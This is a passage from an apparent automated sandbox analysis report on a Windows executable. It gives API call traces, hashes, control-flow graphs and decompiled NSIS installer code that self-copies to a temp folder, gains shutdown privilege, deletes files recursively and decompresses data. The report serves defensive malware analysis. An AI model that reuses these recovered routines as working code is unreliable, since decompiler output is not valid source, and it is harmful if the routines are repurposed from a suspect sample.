                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                  • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                                    • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\4505682666.exe" ,00000000,?), ref: 00403946
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                  • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\4505682666.exe,00420EC8,00000001), ref: 004039D8
                                  • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                  • ExitProcess.KERNEL32(?), ref: 00403A23
                                  • OleUninitialize.OLE32(?), ref: 00403A28
                                  • ExitProcess.KERNEL32 ref: 00403A42
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                  • ExitProcess.KERNEL32 ref: 00403AD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                  • String ID: "C:\Users\user\Desktop\4505682666.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4505682666.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 2292928366-3132891569
                                  • Opcode ID: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                                  • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                  • Opcode Fuzzy Hash: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
                                  • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 405c13-405c39 call 405ede 391 405c52-405c59 388->391 392 405c3b-405c4d DeleteFileW 388->392 394 405c5b-405c5d 391->394 395 405c6c-405c7c call 406507 391->395 393 405dcf-405dd3 392->393 396 405c63-405c66 394->396 397 405d7d-405d82 394->397 401 405c8b-405c8c call 405e22 395->401 402 405c7e-405c89 lstrcatW 395->402 396->395 396->397 397->393 400 405d84-405d87 397->400 403 405d91-405d99 call 40683d 400->403 404 405d89-405d8f 400->404 405 405c91-405c95 401->405 402->405 403->393 412 405d9b-405daf call 405dd6 call 405bcb 403->412 404->393 408 405ca1-405ca7 lstrcatW 405->408 409 405c97-405c9f 405->409 411 405cac-405cc8 lstrlenW FindFirstFileW 408->411 409->408 409->411 413 405d72-405d76 411->413 414 405cce-405cd6 411->414 428 405db1-405db4 412->428 429 405dc7-405dca call 405569 412->429 413->397 416 405d78 413->416 417 405cf6-405d0a call 406507 414->417 418 405cd8-405ce0 414->418 416->397 430 405d21-405d2c call 405bcb 417->430 431 405d0c-405d14 417->431 421 405ce2-405cea 418->421 422 405d55-405d65 FindNextFileW 418->422 421->417 427 405cec-405cf4 421->427 422->414 426 405d6b-405d6c FindClose 422->426 426->413 427->417 427->422 428->404 432 405db6-405dc5 call 405569 call 4062c7 428->432 429->393 441 405d4d-405d50 call 405569 430->441 442 405d2e-405d31 430->442 431->422 433 405d16-405d1f call 405c13 431->433 432->393 433->422 441->422 445 405d33-405d43 call 405569 call 4062c7 442->445 446 405d45-405d4b 442->446 445->422 446->422
                                  C-Code - Quality: 98%
                                  			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				short _v556;
                                  				short _v558;
                                  				struct _WIN32_FIND_DATAW _v604;
                                  				signed int _t38;
                                  				signed int _t52;
                                  				signed int _t55;
                                  				signed int _t62;
                                  				void* _t64;
                                  				signed char _t65;
                                  				WCHAR* _t66;
                                  				void* _t67;
                                  				WCHAR* _t68;
                                  				void* _t70;
                                  
                                  				_t65 = _a8;
                                  				_t68 = _a4;
                                  				_v8 = _t65 & 0x00000004;
                                  				_t38 = E00405EDE(__eflags, _t68);
                                  				_v12 = _t38;
                                  				if((_t65 & 0x00000008) != 0) {
                                  					_t62 = DeleteFileW(_t68); // executed
                                  					asm("sbb eax, eax");
                                  					_t64 =  ~_t62 + 1;
                                  					 *0x42a2a8 =  *0x42a2a8 + _t64;
                                  					return _t64;
                                  				}
                                  				_a4 = _t65;
                                  				_t8 =  &_a4;
                                  				 *_t8 = _a4 & 0x00000001;
                                  				__eflags =  *_t8;
                                  				if( *_t8 == 0) {
                                  					L5:
                                  					E00406507(0x425710, _t68);
                                  					__eflags = _a4;
                                  					if(_a4 == 0) {
                                  						E00405E22(_t68);
                                  					} else {
                                  						lstrcatW(0x425710, L"\\*.*");
                                  					}
                                  					__eflags =  *_t68;
                                  					if( *_t68 != 0) {
                                  						L10:
                                  						lstrcatW(_t68, 0x40a014);
                                  						L11:
                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                  						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
                                  						_t70 = _t38;
                                  						__eflags = _t70 - 0xffffffff;
                                  						if(_t70 == 0xffffffff) {
                                  							L26:
                                  							__eflags = _a4;
                                  							if(_a4 != 0) {
                                  								_t30 = _t66 - 2;
                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                  								__eflags =  *_t30;
                                  							}
                                  							goto L28;
                                  						} else {
                                  							goto L12;
                                  						}
                                  						do {
                                  							L12:
                                  							__eflags = _v604.cFileName - 0x2e;
                                  							if(_v604.cFileName != 0x2e) {
                                  								L16:
                                  								E00406507(_t66,  &(_v604.cFileName));
                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                  								if(__eflags == 0) {
                                  									_t52 = E00405BCB(__eflags, _t68, _v8);
                                  									__eflags = _t52;
                                  									if(_t52 != 0) {
                                  										E00405569(0xfffffff2, _t68);
                                  									} else {
                                  										__eflags = _v8 - _t52;
                                  										if(_v8 == _t52) {
                                  											 *0x42a2a8 =  *0x42a2a8 + 1;
                                  										} else {
                                  											E00405569(0xfffffff1, _t68);
                                  											E004062C7(_t67, _t68, 0);
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = (_a8 & 0x00000003) - 3;
                                  									if(__eflags == 0) {
                                  										E00405C13(__eflags, _t68, _a8);
                                  									}
                                  								}
                                  								goto L24;
                                  							}
                                  							__eflags = _v558;
                                  							if(_v558 == 0) {
                                  								goto L24;
                                  							}
                                  							__eflags = _v558 - 0x2e;
                                  							if(_v558 != 0x2e) {
                                  								goto L16;
                                  							}
                                  							__eflags = _v556;
                                  							if(_v556 == 0) {
                                  								goto L24;
                                  							}
                                  							goto L16;
                                  							L24:
                                  							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                  							__eflags = _t55;
                                  						} while (_t55 != 0);
                                  						_t38 = FindClose(_t70); // executed
                                  						goto L26;
                                  					}
                                  					__eflags =  *0x425710 - 0x5c;
                                  					if( *0x425710 != 0x5c) {
                                  						goto L11;
                                  					}
                                  					goto L10;
                                  				} else {
                                  					__eflags = _t38;
                                  					if(_t38 == 0) {
                                  						L28:
                                  						__eflags = _a4;
                                  						if(_a4 == 0) {
                                  							L36:
                                  							return _t38;
                                  						}
                                  						__eflags = _v12;
                                  						if(_v12 != 0) {
                                  							_t38 = E0040683D(_t68);
                                  							__eflags = _t38;
                                  							if(_t38 == 0) {
                                  								goto L36;
                                  							}
                                  							E00405DD6(_t68);
                                  							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
                                  							__eflags = _t38;
                                  							if(_t38 != 0) {
                                  								return E00405569(0xffffffe5, _t68);
                                  							}
                                  							__eflags = _v8;
                                  							if(_v8 == 0) {
                                  								goto L30;
                                  							}
                                  							E00405569(0xfffffff1, _t68);
                                  							return E004062C7(_t67, _t68, 0);
                                  						}
                                  						L30:
                                  						 *0x42a2a8 =  *0x42a2a8 + 1;
                                  						return _t38;
                                  					}
                                  					__eflags = _t65 & 0x00000002;
                                  					if((_t65 & 0x00000002) == 0) {
                                  						goto L28;
                                  					}
                                  					goto L5;
                                  				}
                                  			}


















                                  0x00405db1
                                  0x00405db4
                                  0x00000000
                                  0x00000000
                                  0x00405db9
                                  0x00000000
                                  0x00405dc0
                                  0x00405d89
                                  0x00405d89
                                  0x00000000
                                  0x00405d89
                                  0x00405c63
                                  0x00405c66
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c66

                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,\*.*), ref: 00405C84
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                  • FindClose.KERNELBASE(00000000), ref: 00405D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*$\*.*
                                  • API String ID: 2035342205-3414810432
                                  • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                  • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                  • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                  • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 98%
                                  			E00406BFE() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				void* _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t590;
                                  				signed int* _t607;
                                  				void* _t614;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t614 - 0x40) != 0) {
                                  						 *(_t614 - 0x34) = 1;
                                  						 *(_t614 - 0x84) = 7;
                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                  						L132:
                                  						 *(_t614 - 0x54) = _t607;
                                  						L133:
                                  						_t531 =  *_t607;
                                  						_t590 = _t531 & 0x0000ffff;
                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                  						if( *(_t614 - 0xc) >= _t565) {
                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                  							 *(_t614 - 0x40) = 1;
                                  							_t532 = _t531 - (_t531 >> 5);
                                  							 *_t607 = _t532;
                                  						} else {
                                  							 *(_t614 - 0x10) = _t565;
                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                  						}
                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                  							L139:
                                  							_t533 =  *(_t614 - 0x84);
                                  							L140:
                                  							 *(_t614 - 0x88) = _t533;
                                  							goto L1;
                                  						} else {
                                  							L137:
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								 *(_t614 - 0x88) = 5;
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                  							goto L139;
                                  						}
                                  					} else {
                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  						__esi =  *(__ebp - 0x60);
                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  						__ecx =  *(__ebp - 0x3c);
                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  						__ecx =  *(__ebp - 4);
                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  						if( *(__ebp - 0x38) >= 4) {
                                  							if( *(__ebp - 0x38) >= 0xa) {
                                  								_t97 = __ebp - 0x38;
                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                  							} else {
                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  							}
                                  						} else {
                                  							 *(__ebp - 0x38) = 0;
                                  						}
                                  						if( *(__ebp - 0x34) == __edx) {
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							L60:
                                  							__eax =  *(__ebp - 0x58);
                                  							__edx = __ebx + __ebx;
                                  							__ecx =  *(__ebp - 0x10);
                                  							__esi = __edx + __eax;
                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								_t216 = __edx + 1; // 0x1
                                  								__ebx = _t216;
                                  								__cx = __ax >> 5;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								L59:
                                  								if(__ebx >= 0x100) {
                                  									goto L54;
                                  								}
                                  								goto L60;
                                  							} else {
                                  								L57:
                                  								if( *(__ebp - 0x6c) == 0) {
                                  									 *(__ebp - 0x88) = 0xf;
                                  									goto L170;
                                  								}
                                  								__ecx =  *(__ebp - 0x70);
                                  								__eax =  *(__ebp - 0xc);
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								_t202 = __ebp - 0x70;
                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								goto L59;
                                  							}
                                  						} else {
                                  							__eax =  *(__ebp - 0x14);
                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  							if(__eax >=  *(__ebp - 0x74)) {
                                  								__eax = __eax +  *(__ebp - 0x74);
                                  							}
                                  							__ecx =  *(__ebp - 8);
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  							L40:
                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  							 *(__ebp - 0x48) = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								 *(__ebp - 0x40) = 1;
                                  								__cx = __ax >> 5;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								L38:
                                  								__eax =  *(__ebp - 0x40);
                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  									while(1) {
                                  										if(__ebx >= 0x100) {
                                  											break;
                                  										}
                                  										__eax =  *(__ebp - 0x58);
                                  										__edx = __ebx + __ebx;
                                  										__ecx =  *(__ebp - 0x10);
                                  										__esi = __edx + __eax;
                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                  										__ax =  *__esi;
                                  										 *(__ebp - 0x54) = __esi;
                                  										__edi = __ax & 0x0000ffff;
                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  										if( *(__ebp - 0xc) >= __ecx) {
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  											__cx = __ax;
                                  											_t169 = __edx + 1; // 0x1
                                  											__ebx = _t169;
                                  											__cx = __ax >> 5;
                                  											 *__esi = __ax;
                                  										} else {
                                  											 *(__ebp - 0x10) = __ecx;
                                  											0x800 = 0x800 - __edi;
                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  											__ebx = __ebx + __ebx;
                                  											 *__esi = __cx;
                                  										}
                                  										 *(__ebp - 0x44) = __ebx;
                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                  											L45:
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t155 = __ebp - 0x70;
                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  										}
                                  									}
                                  									L53:
                                  									_t172 = __ebp - 0x34;
                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                  									L54:
                                  									__al =  *(__ebp - 0x44);
                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  									L55:
                                  									if( *(__ebp - 0x64) == 0) {
                                  										 *(__ebp - 0x88) = 0x1a;
                                  										goto L170;
                                  									}
                                  									__ecx =  *(__ebp - 0x68);
                                  									__al =  *(__ebp - 0x5c);
                                  									__edx =  *(__ebp - 8);
                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  									 *( *(__ebp - 0x68)) = __al;
                                  									__ecx =  *(__ebp - 0x14);
                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                  									__eax = __ecx + 1;
                                  									__edx = 0;
                                  									_t191 = __eax %  *(__ebp - 0x74);
                                  									__eax = __eax /  *(__ebp - 0x74);
                                  									__edx = _t191;
                                  									L79:
                                  									 *(__ebp - 0x14) = __edx;
                                  									L80:
                                  									 *(__ebp - 0x88) = 2;
                                  									goto L1;
                                  								}
                                  								if(__ebx >= 0x100) {
                                  									goto L53;
                                  								}
                                  								goto L40;
                                  							} else {
                                  								L36:
                                  								if( *(__ebp - 0x6c) == 0) {
                                  									 *(__ebp - 0x88) = 0xd;
                                  									L170:
                                  									_t568 = 0x22;
                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                  									_t535 = 0;
                                  									L172:
                                  									return _t535;
                                  								}
                                  								__ecx =  *(__ebp - 0x70);
                                  								__eax =  *(__ebp - 0xc);
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								_t121 = __ebp - 0x70;
                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								goto L38;
                                  							}
                                  						}
                                  					}
                                  					L1:
                                  					_t534 =  *(_t614 - 0x88);
                                  					if(_t534 > 0x1c) {
                                  						L171:
                                  						_t535 = _t534 | 0xffffffff;
                                  						goto L172;
                                  					}
                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                  						case 0:
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                  							_t534 =  *( *(_t614 - 0x70));
                                  							if(_t534 > 0xe1) {
                                  								goto L171;
                                  							}
                                  							_t538 = _t534 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t570);
                                  							_push(9);
                                  							_pop(_t571);
                                  							_t610 = _t538 / _t570;
                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                  							asm("cdq");
                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                  							 *(_t614 - 0x3c) = _t605;
                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                  								L10:
                                  								if(_t613 == 0) {
                                  									L12:
                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                  									goto L15;
                                  								} else {
                                  									goto L11;
                                  								}
                                  								do {
                                  									L11:
                                  									_t613 = _t613 - 1;
                                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                  								} while (_t613 != 0);
                                  								goto L12;
                                  							}
                                  							if( *(_t614 - 4) != 0) {
                                  								GlobalFree( *(_t614 - 4));
                                  							}
                                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  							 *(_t614 - 4) = _t534;
                                  							if(_t534 == 0) {
                                  								goto L171;
                                  							} else {
                                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
